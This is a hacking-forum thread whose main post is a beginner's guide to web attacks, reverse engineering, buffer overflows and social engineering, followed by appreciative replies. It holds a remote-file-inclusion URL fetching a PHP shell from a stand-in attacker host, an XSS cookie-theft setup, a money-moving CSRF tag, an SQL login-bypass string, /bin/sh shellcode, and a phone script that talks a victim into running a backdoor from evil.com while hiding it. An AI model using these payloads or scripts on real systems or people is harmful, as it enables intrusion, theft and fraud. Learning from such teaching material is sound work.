Guide to General Hacking
#1
Note: The following guide is based off my experience and personal beliefs as a hacker.  I will not be held responsible with how you use this knowledge.  All of the information listed below can be used to perform criminal activities, but I do not suggest you use them as such.  Thank you.

[Image: MJDRFTF.png]
Guide to General Hacking
Contents
Preface
Hello Guest it seems you have taken the first steps to following a very interesting and difficult path.
This is a guide designed to help people sway from things like DDoSing or RATs.  While they have their purpose they are both tools that are commonly used by the uninitiated and take little to no skills to use.  I desire to turn skids from deviant gamers into thoughtful computer scientists. The guide is not meant as a single point of education, instead it is an explanation of many schools of thoughts and techniques, explained through example.  This is the H3R0's guide to general hacking.
Definition of the Art & Science
I personally believe hacking is both an art and a science, without trying to sound vexatious, I believe it is one of the most important modern life styles.  The definition of hacking has gone from a very specific idea to an ambiguous one.   But to me hacking is simply using one's knowledge of a system to create an unintended outcome.  This is seen in hacking computers, phones, locks, general purpose electronics, and even people.
Purpose of the Guide
This guide isn't going to be-all end-all solution.  You will not read it and suddenly know how to break into any system, no guide will give you that.  The guide is designed to help you get a foot hold into hacking methodology and give examples on what expect as well as show what one should start learning.  There are some legitimate exploits in this guide that can be found "in the wild", but your goal shouldn't be to find and execute these exploits.  Instead you should hope to understand them more.
Prerequisites
Not everyone has the tools to become a "proper hacker" from the beginning.  By this I do not mean to say that a certain computer, piece of software, or a magical Linux distribution is required.  Seldom are those things actually required to start your path.  The tools that I am actually speaking of are the
  • Common Sense
  • Computer Proficiency
  • Being an autodidact


The reason for these is pretty simple, but for those looking for more guidance I will spell them out.

Common sense, while an obvious one, it is seen too little, even in a hacking community.  Common sense entails having the ability to create a problem for yourself and reasonably solve it with either requested information or found information.

Computer proficiency, while obvious, is a little misunderstood.  One does not need to know the Intel CPU architecture, C++, or even know your way through CLI.  I simply mean one should be able to approach any piece of software and, through exploration, be able to use the program.  This doesn't mean proficiency with a single piece of software, this is the equivalent of being a musician and being able to walk up to any instrument and create moderately pleasant sounding noise from it.  No guide, no coaching, just pure intuition.  With that said one should always learn the languages and concepts that are based around an exploit.  Parroting PHP or XSS vulnerabilities will get you no where.

Autodidactism, a powerful method of education.  Whether you are going to MIT, studying under Kevin Mitnick, or taking night classes to approach the goal of becoming a hacker one must always be an autodidact.  To have the drive to educate yourself and answer the questions that nobody has asked.  There is no sweeter goal than to accomplish something that didn't require a helping hand, true intellectual freedom.
Note: There will be terms in this article that you may have to look up.  Hacking is a very wide subject and to discuss it in a single paper is very difficult.  Things will be glossed over and sometimes not fully explained.
Hacking the Web
One of the most unfortunate things about modern web "hacking" is that it is seldom as amazing as one might think.  Very similar to a powerful magic trick the "magic" is lost when you realize there is a very simple and ugly solution.  The account was phished, the security questions were guessed, the user was left logged into a public computer...  All very disenchanting ideas, yet some of the most common solutions.  But outside of human manipulation, I don't consider these to be actual hacking techniques, they can all be on par with RATs and DDoSing.  Things I would consider true hacking would have to be, but not limited to, the following...
  • Crafting an XSS attack
  • Crafting a CSRF attack
  • Crafting a directory transversal attack
  • Crafting a SQL injection
  • Crafting a file inclusion attack

The reason I preface the above list with "Crafting" is because using a previously discovered exploit or attack is simply parroting.  While finding and executing exploits can sometimes take an amount of skill, it is no where as difficult as developing an attack yourself.  The list is in no particular order of importance because each of these attacks can potentially be extremely dangerous to a website.  With that being said I will now attempt to review each of the listed attacks, including information of why they behave that way and how they are exploited.
- Cross Site Scripting (XSS)
To fully grasp an understand how XSS functions I believe you should have some experience in the following...
  • Server side language (like PHP)
  • Javascript
  • HTML

Cross site scripting would have to be one of those attacks that can range from simple defacing of a page to a total site take over.  You are only limited by your creativity.  The general idea of the exploit is that the attacker injects javascript into a page where the victim would then run it automatically by visiting.

Here is a quick example.  Let's say the victim website has a search function that repeats the searched string then displays the results.  Something that is very common.  But let's also add that the victim doesn't have much PHP experience so they do not filter out HTML form the search results.  This is now a potential XSS exploit.

Page code
Code:
<?php
 $search_string = $_GET['q'];
 // normally a database query would be here but we'll leave that out.
 echo 'You searched for "' . $search_string . '"';
 echo $results;
?>

Now if you go to http://example.com/search.php?q=cat%20videos you would get a page with the following message

Code:
 You searched for "cat videos"
 [Results here]

Those who are a little quick on their feet can already see where I'm going with this...  If one were to add a script tag into the search string, it would run our script on that page for anyone who followed our link.  This could be an easy way to steal browser cookies(the user session) of an administrator.  If we enter http://example.com/search.php?q=<script>.../script&gt; this would result in a page like this..

Code:
 You searched for "<script>alert('XSS');</script>"
 [Results here]

This would create a javascript popup simply saying "XSS".  At this point you could use a cookie stealer or create a phishing page using javascript.  If you want to follow a deeper and more in depth XSS tutorial go here. http://greysec.net/showthread.php?tid=177

Now while this is a quick overview of XSS this is a wide subject worthy of its own paper.  There are many excellent resources and war games to learn from, all of which can be easily found via a quick Google search.
- Cross Site Request Forgery (CSRF)
To fully grasp an understand how CSRF functions I believe you should have some experience in the following...
  • Server side language (like PHP)

Cross Site Request Forgery can be described as forcing the victim to automatically submit data to a trusted websites.  This is an exploit that exists purely due to ignorance/bad server configuration.  The general idea of CSRF is data is submitted to a trusted website unbeknownst to the victim.  Some examples may include using the password change form on a website to update their password to something else, get likes or ratings on a social media network, or even send money through a bank.

Here is a quick example..
Let's say there is a bank website that has a function that allows a user to send money to another account through a webpage.  Now let's also say that bank's web page doesn't check the HTTP referrer during form submissions.  By using the service one could easily figure out how the system works.  User posts the form then they are taken to a url like http://example.com/sendmoney?to=bobbyjon...eason=rent
Simple enough.  Well now let's invite the victim to check out our new website we're working on (this part would be considered human manipulation) via an email or social network message.

Quote:Hey Jill,
I just wanted to show you this website I've been working on.  Please check it out.
http://exampleattack.com

Now on this page you would have something similar to this...
Code:
<img src="http://example.com/sendmoney?to=attacker&amount=1337.00&reason=exploits">

When Jill's browser opens that image it will give a broken image appearance to Jill. More importantly it will force Jill (if she is logged into the bank) to send the user attacker $1337.00 without her knowing, until she checks her balance.

CSRF is a very wide subject, like all things involved with hacking, and could not be covered in the depth that it truly deserves.  I would suggest checking the many Internet resources about it that are available via a quick Google search.
- Directory Transversal Attack
To fully grasp an understand how directory transversal functions I believe you should have some experience in the following...
  • Server side language (like PHP)
  • Navigating folder structures in a Unix/Linux environment

A directory transversal attack is simply forcing a website to expose restricted files by editing the path where the server is searching.
A simple example would be a website that displays text files that are requested through the url, but for our purposes the developer is unaware of directory transversal.

Page Code...
Code:
<?php
 $file_name = $_GET['file'];
 $f = fopen("/home/webserver/http/txt/" . $file_name, "r") or die("Unable to open file!");
 echo fread($f, filesize($file_name));
 fclose($f);
?>

Now if you were to go to http://example.com/?file=news.txt the server would serve up /home/webserver/http/txt/news.txt to the user.  But let's say there is a configuration file we want in the directory /home/webserver/secret.config we could access it by loading up the following URL
http://example.com/?file=../../secret.config
Using the special directory ".." we were able to go up a directory multiple times until we had our path set to the desired location.  The path fully written out would be /home/webserver/http/txt/../../secret.config  the two .. cancel out the previous folders putting us in the /home/webserver directory.

Directory transversals, when discovered, can be used to uncover a large amount of data.  Anything from source code, database configuration, passwords, or secret files.  Like XSS you are only limited by your imagination, with that said I would suggest further research into directory transversals since you can come across other interesting concepts like null bytes for bypassing force file names and other such techniques.
- SQL Injection
To fully grasp an understand how SQL injection functions I believe you should have some experience in the following...
  • Server side language (like PHP)
  • SQL

The holy grail of exploits, SQL injection.  This is something that is becoming harder and harder to come by and is as vast as the language it originates from.  To understand the basics of SQL injection one my first truly understand SQL and PHP.  With being said SQL injection is a way to modify a SQL query by inserting invalid characters into data that is being used by the query.  There are a wide verity of uses for SQL injection but the most common example would have to be bypassing a login form.  With that said I still have to state that SQL injection is powerful and you are only limited by your knowledge of SQL.
A simple example...
Let's say there is a website that has a simple login form that takes a user name and a password.  Very standard, but what if the developer didn't know anything about SQL inject and how to prevent it?
To prevent having a large amount of PHP code for such a small example I will write pseudo code and will only focus on the user validation part of the code.
The validation script
Code:
$query = sql('SELECT * FROM users WHERE name="' . $username . '" AND password="' . md5($password) . '"');
if (count($query)) {
 create_session_for_user($query[0]->uid);
}
else {
 echo 'not a valid username or password';
}

Pretty simple...  The sql query checks if a username with the inputed password exists, if it exists create a login session for that user.  But what if we manipulated the data to make the SQL query bend to our whim?  What if we took
SELECT * FROM users WHERE name="someusername" AND password="RANDOMINFORMATION"
and turned it into the below query by saying our user name was... " OR "1"="1"--

SELECT * FROM users WHERE name="" OR "1"="1"--" AND password="RANDOMINFORMATION"
This would load every user from the user table, resulting in use logging in as the first user in the database (most likely and admin).  Let's dissect the query further....  The -- actually is a comment which will make mysql ignore anything to the left of the --, same goes for /*

SELECT * FROM users WHERE name="" OR "1"="1"--" AND password="RANDOMINFORMATION"
So our query is now..
SELECT * FROM users WHERE name="" OR "1"="1"

Which is a lot more readable.  At this point the query is saying select all fields from the table users where name is empty OR 1 equals 1.  This is a query that is always true.  No there isn't a blank user but 1 will always equal 1 resulting in all the users being dumped.  If you have a mysql DB with a user table similar to this I would suggest trying that query/experimenting.

Now, in this instance the SQL injection " OR "1"="1"-- worked but that wont always be the case.  Sometimes you wont be able to use certain characters or they query might use single quotes instead of double quotes.  This is where experimentation comes in and of course you MUST dive into this subject more.  These few paragraphs on SQL injection do not even scratch the surface of what is possible.  Please research more into this and always keep your eyes open for potential SQL injections.
- File Inclusion
To fully grasp an understand how file inclusion functions I believe you should have some experience in the following...
  • Server side language (like PHP)

File inclusion vulnerabilities are becoming more and more rare these days, but when they are found they can be extremely powerful.  This exploit put simply is just tricking the server into rendering malicious code instead of the intended file.
Example, let's say I have a website that can load different themes based off of a url query like so...
http://example.com/?theme=dark this would trigger some php code that would include the proper theme files into the page.
Page code
Code:
<?php
 if (isset($_GET['theme'])) {
   include($_GET['theme'] . '.php');
 }
?>

Note that this is comparable to the directory transversal attack, but since the code is executing the included file it is worth while to inject malicious files instead of trying to read local ones.

A simple way we could execute any code we want here is to build a PHP shell and use the exploit to run it on the victim server.  After writing our shell we would go to the following URL...
http://example.com/?theme=http://attacke...pshell.txt?
This forces PHP to run..
Code:
include('http://attackerexample.com/phpshell.txt?.php');
This downloads our script at this point we could do just about anything we wanted to on the server, depending on your PHP skills.  Once again I have to reiterate that this is a wide subject and continued research must be put into this.
Application Hacking
There are many types of hacking but I would have to say application hacking is the one that demands the most respect.  When I say application hacking I'm referring to the following activities application reverse engineering, writing buffer/stack overflows, privilege escalation, and all around tinkering with software at deep intimate level.  Before continuing this section I have to say knowing and truly understanding the C programming language as well as being able to read assembly language is of the utmost importance.  If you want to really learn this I would have to say "The Art of Exploitation" is the most important book to have in your library.

To be honest I don't know if I have a large enough knowledge base to even know where to start covering application hacking, that's just how large of a topic it is.  But I will attempt to do my best.
- Reverse Engineering
The process of reverse engineering can be used for many things.  It can be used to find hidden data, create shortcuts in programs(skipping registration), or even something as complicated as figuring out how to generate valid serial numbers.

Example, let's say someone wrote this horrible password program and keep the password hard coded in plain text into the application.  Well, with some simple reverse engineering will get that right out for us...  For the sake of the guide I removed the plain text password for now...
Code:
#include <stdio.h>
int main(void) {
 char pass[100];
 char hidden[] = "[REDACTED]";
 printf("Enter the password: ");
 scanf("%s", pass);

 if (strcmp(pass, hidden) == 0) {
     printf("Correct password\n");
 }
 else {
     printf("Invalid Password\n");
 }
 return 0;
}

Once we have the compiled binary you can disassemble it, and since I'm both simple and poor I will be using GDB.
Code:
~/Desktop$ gcc -m32 password.c -o pass
~/Desktop$ gdb pass
(gdb) disas main
Dump of assembler code for function main:
  0x0804851b <+0>:  lea    ecx,[esp+0x4]
  0x0804851f <+4>: and    esp,0xfffffff0
  0x08048522 <+7>: push   DWORD PTR [ecx-0x4]
  0x08048525 <+10>:  push   ebp
  0x08048526 <+11>:  mov    ebp,esp
  0x08048528 <+13>:  push   ecx
  0x08048529 <+14>:  sub    esp,0x84
  0x0804852f <+20>:  mov    eax,gs:0x14
  0x08048535 <+26>:  mov    DWORD PTR [ebp-0xc],eax
  0x08048538 <+29>:  xor    eax,eax
  0x0804853a <+31>:  mov    DWORD PTR [ebp-0x7f],0x6d6f6f74
  0x08048541 <+38>:  mov    DWORD PTR [ebp-0x7b],0x73796e61
  0x08048548 <+45>:  mov    DWORD PTR [ebp-0x77],0x65726365
  0x0804854f <+52>:  mov    WORD PTR [ebp-0x73],0x7374
  0x08048555 <+58>:  mov    BYTE PTR [ebp-0x71],0x0
  0x08048559 <+62>:  sub    esp,0xc
  0x0804855c <+65>:  push   0x8048670
  0x08048561 <+70>:  call   0x80483c0 <printf@plt>

Let's now dive into the code and try to find where our string might just be...  This may be confusing if you have never touched ASM but I hope to be at least somewhat of a guide.

The left column is the memory space the ASM command resides in, the second column is a GDB debugger alias (example main*10 points at 0x08048525), the third column is the ASM function, and the fourth column are the arguments.

The real fun in the program doesn't start for us until main*26 .  This is where we start writing to memory for the variable hidden (which contains the password), the variable pass(and subsequent space in memory) was created around main*14.  As you can see we have XOR eax, eax which writes a 0 to eax.

After that we see MOV DWORD PTR [ebp-0x7f],0x6d6f6f74 this is moving the hex data 0x6d6f6f74 into ebp's position minus 0x7f which is 127 in decimal.  Then you see another call to MOV DWORD PTR, then again, and again, and again until it is a BYTE PTR.  This is essentially the way assembly stores a long string in the stack terminating it with a null byte (0x0) as C typically does.  Once this happens the code moves the stack pointer(esp) by 0xc (decimal 12).  At that point the code writes 0x8048670 to the stack(The argument for printf is stored there) and calls the function printf at 0x80483c0.

What does this all mean?  Well in short we made space for the an empty var to be stored, wrote a lot of hex to the stack, and then called printf... Seem familiar?

Code:
 char pass[100];
 char hidden[] = "[REDACTED]";
 printf("Enter the password: ");

At this point it is safe to say all the hex stored was our password string so let's collect it, but remember the stack goes in reverse...
0x73746572636573796e616d6f6f74 now convert this hex into ascii and you get stercesynamoot, makes no sense until you remember that the stack is reversed so you should reverse the string...
[Image: z4nQ393.png]

Of course this is just a tiny taste of it.  An expert could lecture for hours and still once touch the surface, this is a never ending field.  The best way to actually learn how to reverse engineer a complex program is to write many complex applications and understand them at a very low level(ASM).
- Buffer Overflows
There are two types of buffer overflows, stack and heap, but the basic idea stays the same.  Corrupt data so you can execute code and hopefully obtain a shell.  These types of attacks used to be very common until things like ASLR and DEP were implemented and used to make running shell code in a buffer overflow more difficult.  ASLR (Address Space Layout Randomization) is designed to move the starting memory positions of code at random.  This mitigates the use of things like libc.so to create a shell.  To see it in action run ldd against a binary multiple times and watch the memory address change.  DEP (Data Execution Prevention) is designed to prevent executable code running in non executable memory locations.  By itself it is pretty useless, but used in tandem with ASLR it is almost bullet proof.  I wont be covering bypassing ASLR and DEP, but I'm sure with some research you can find more about it.

Buffer Overflows (Note: for real life examples and practice read the "Smashing The Stack For Fun And Profit" by Aleph One I only cover the theory behind it)
I will not review how the stack functions in this short section.  For that you could easily read the above mentioned paper.  But the general idea of a buffer overflow is to find a way to input data into a vulnerable program(Typically through an argument in the program).  Then inject data into the program until the target variable's allocated space in memory is full.  After this you surpass that limit by adding even more data.  This results in the "Stack overflow error" you may have seen in different programs.  The most common way to exploit this is to first build a snippet of C or Assembly code that spawns a shell, compile it then convert it to hex.  (EX. This is a shell that calls system("/bin/sh/"); "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80") Once you have your shell the you can now figure out how much data to fill the stack with, followed by the shell, then by 4 bytes of NOP, and finally a return address that forces the program to run our shell.  At first this may seem a little complicated but allow me to explain further...

In a compiled language when you declare a variable you typically have to give it a range.  This allows the Assembly code to define an uninitialized section of memory.  This seems fine, but sometimes programs unintelligently write every input to memory while not understanding what that its boundary should be.  By excelling that limit the program writes variable data into the stack (This is where the rest of the assembly instructions should have been).
Here is an example of a program running with no buffer overflow...



[Image: 6NayrSG.png] You can see that the variable was allowed a significant amount of space before the return address is called.  This is how the designer intended it to be.  Let's now see what happens when we bypass that and start over writing parts of the stack!

[Image: xK6Ky9Z.png] You can see here that we filled up the memory buffer and actually wrote over the return address.  This results in an error where the program can't find the return address.  It is trying to locate 0x41414141 in memory.  This is because A is represented in hex by 0x41, so the program can't find the memory address "AAAA".  Now with the knowledge that we can over run the return address with anything (And assuming DEP and ASLR are not an issue) how could we exploit this?  Maybe injecting our own shell?  Here's an example of the stack with shell code in it.


[Image: 55xXkaU.png] Since we need to fill out the whole alloted memory space(48 bytes) we take our shell code and do basic math, figuring out that we need 21 bytes of padding.  This is what the A's represent.  Now we see our shell code starting.  After this you can see the new return address we defined, this is shown as RRRR on the diagram.  RRRR is defined by figuring out what the position of the golden S is, since this is where our shell starts.  When the program runs it will place the A's into memory, then the shell code, and finally it will go to the return address that we defined.  If done correctly one would have spawned a shell in a program.  This is great for gaining a user shell on a remote server or privilege escalation.

Like stated above this is only theory but there are MANY practical tutorials, real life examples, and of course wargames.  I would suggest you check them all out if you are interesting in buffer overflows and how they function at a practical level.
Human Manipulation & Social Engineering
There are some people who may view human manipulation as hacking and there are some who view it simply as another step in a large successful hack.  I view it as an art, to do human manipulation is to be a living artifice.  Similar to application hacking, manipulation is a very wide field which has hundreds upon hundreds of methods and reasons.  But every attack more or less follows the steps shown in the below diagram.  Underneath the chart I will attempt to explain some of the techniques and methods behind each step.
[Image: xEYa3lK.jpg]
- Footprinting
As everyone has heard at one point or another "Knowledge is power".  Footprinting is simply using the target environment to collect information in hope to aid a future attack.  There are many things that are commonly left around in an office that can be used to footprint a target.  Here is just a few of them...
  • Employee IDs, names, and phone numbers
  • Printed memos
  • Employee passwords (Sticky notes on computer monitors are the bane of OPSEC)
  • Project information
  • Pay stubs
  • Event listings

Anything you can gather that has information should be copied or memorized.  This will allow you to understand the mind and schedule of your potential victim.
- Establishing Trust
Those who are auspicious when it comes to hacking tend to have one thing in common, previous knowledge.  Gathering information is something that can be done simply over a quick email or phone call.  No technical knowledge or hacking required, simply leveraging ignorance, passiveness, and a desire to serve the customer.  The fastest way to get someone talking about potentially vital information is to gain a rapport with the soon to be victim.  To gain the trust of a victim you can use one of the following methods...
  • Attempt an empathetic relationship
  • Pose as a trusted but obscure position (Example: Employee of branch x or contracted IT specialist)
  • Pose as a higher up (Note: this will most likely backfire)
- Psychological Manipulation
Once a rapport has been established and the attacker now has enough qualifying information, it is time to extract as much sensitive information as possible.  In this phase of the attacker uses the established trust of the victim to perform acts such as (but not limited to)...
  • Downloading/installing a backdoor
  • Enabling remote access to a server
  • Disclosing passwords
  • Disclosing confidential user information

Once this has been done the attacker will attempt to move onto the next target or start entering the system through any backdoors put in place by the victim.
- The Exit
To perfect and maintain a clean social engineering attack one must perform the exit.  An exit is using all of the tools you have at your disposal to remove evidence that a social engineering attack took place while leaving without causing any suspicion.  This can be done by wrapping your true intentions in other actions.

For example let's say we are social engineering to have someone install a backdoor.  We have already gained rapport and are a trusted entity.  Instead of starting off will "Ok please open your bowser and type http://evil.com/backdoor.exe" we will wrap our intentions.

Quote:"Ok so for starters let's go ahead and run some diagnostics...  Please press the windows key + R and type Msconfig"
"Ok that's done now what?"
"Can you read off value x?"
"[reply]"
"Hmmm, ok.  What I'm going to need you to do is download the XP sp3 patch.  Press windows key + R and type http://evil.com/backdoor.exe this should start a download, let me know when you have it..."
"Ok it's on my desktop"
"Just double click that for me and follow the prompts"
"Ok it says it is fully installed"
"Great, now we need to run a few more tests and we can be all done...  Open up msconfig and read off value y for me"
"[reply]"
"Ok fantastic and lastly open up command prompt and type ipconfig, what are those values?"
"[reply]"
"Great, great.  [name] you did great your machine should be up to date."
"Oh thank you"
"No [name] you just made my day easier, but now I have 3 more offices to do in call visits.  Either way have a great day."

By wrapping the attack in both simple and slightly confusing requests we have helped mask the attack and made a clean exit.

Social engineering is a huge field and should be studied as such.  There are many great articles on the Internet if you choose to study this school of thought.
- Notes on Human Behavior
Every body functions in certain ways.  If you pay attention you can see how someone ticks and with that you can bend them in any way to do as you ask.  Instead of listing out all the traits I will just redirect you to an article on human manipulation written by Dinesh Shetty.  http://securityxploded.com/social-engine...factor.php
Author's Notes
I really do hope whether you are a novice or an "uber 1337 hax0r" that you took something away from this paper.  Hacking is a very wide and beautiful subject, something I care very much about.  I hope to spread that.  I would also REALLY love people to stop asking me how to hack facebooks.  Also, if you find any discrepancies or errors, please let me know and I'll correct them.  I only desire to get the best information that I can muster to those who seek it. And as always "Hack to learn, not learn to hack"
Resources
Reply
#2
Nice to finally see you back in action NO-OP Smile
didn't really know you had a copy of this thread still, but it's a very good resource for anyone wanting to learn Smile
Reply
#3
(06-17-2015, 12:33 PM)Atlas Wrote: Nice to finally see you back in action NO-OP Smile
didn't really know you had a copy of this thread still, but it's a very good resource for anyone wanting to learn Smile

I might not be making too many new threads in the near future but I'll be around.

As for this thread, yeah before the close of HS I went through my threads and grabbed what I felt might be important. This was one of them only issue is, is the formatting. We need the table and chapter bbcode plugins.

But I'm glad to see people supporting this thread after it's been tossed around so much.
Reply
#4
Looking good NOP-OP! I'll get the table codes and chapter codes :)
Reply
#5
(06-17-2015, 12:38 PM)Insider Wrote: Looking good NOP-OP! I'll get the table codes and chapter codes Smile

This is the reason why you're the best. Also is there any quick way to see what BBCodes are available to users?
Reply
#6
The editor and some JS stuff is currently not functional, the theme I made this on was made by a ripper and was broken on default. Although I come to realize this later, but I'm working on a new theme. You can find BB codes here: http://docs.mybb.com/1.6/MyCode/
Reply
#7
NO-OP HQ as always! Will be nice reading more of your threads Smile
Reply
#8
Wow, I know this is an old thread, but I really enjoyed reading it. I read all of it and loved it. Thanks NO-OP for sharing this high quality post!
Reply
#9
(01-30-2016, 02:16 AM)Beau Wrote: Wow, I know this is an old thread, but I really enjoyed reading it. I read all of it and loved it. Thanks NO-OP for sharing this high quality post!

Thank you, it was a lot of fun to write and it's a great way of kick starting an interest in most major forms of exploitation/hacking. I also got to learn a little bit more about the sections that I'm not proficient in so it was a learning experience for me too.
Reply
#10
Many thanks for this NO-OP

(01-31-2016, 10:21 AM)NO-OP Wrote:
(01-30-2016, 02:16 AM)Beau Wrote: Wow, I know this is an old thread, but I really enjoyed reading it. I read all of it and loved it. Thanks NO-OP for sharing this high quality post!

Thank you, it was a lot of fun to write and it's a great way of kick starting an interest in most major forms of exploitation/hacking.  I also got to learn a little bit more about the sections that I'm not  proficient in so it was a learning experience for me too.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Security/Hacking Ebook Collection Insider 134 199,903 07-18-2020, 08:20 AM
Last Post: Vice
  Is releasing hacking tools a bad idea? DeepLogic 2 1,160 07-16-2020, 09:16 PM
Last Post: Vector
  Vigilante Hacking - Heroes or Menaces DeepLogic 12 3,089 07-14-2020, 04:34 PM
Last Post: poppopret
  Is learning Games Hacking useful? Bass_R33v3s 8 2,330 06-16-2020, 12:58 AM
Last Post: Bass_R33v3s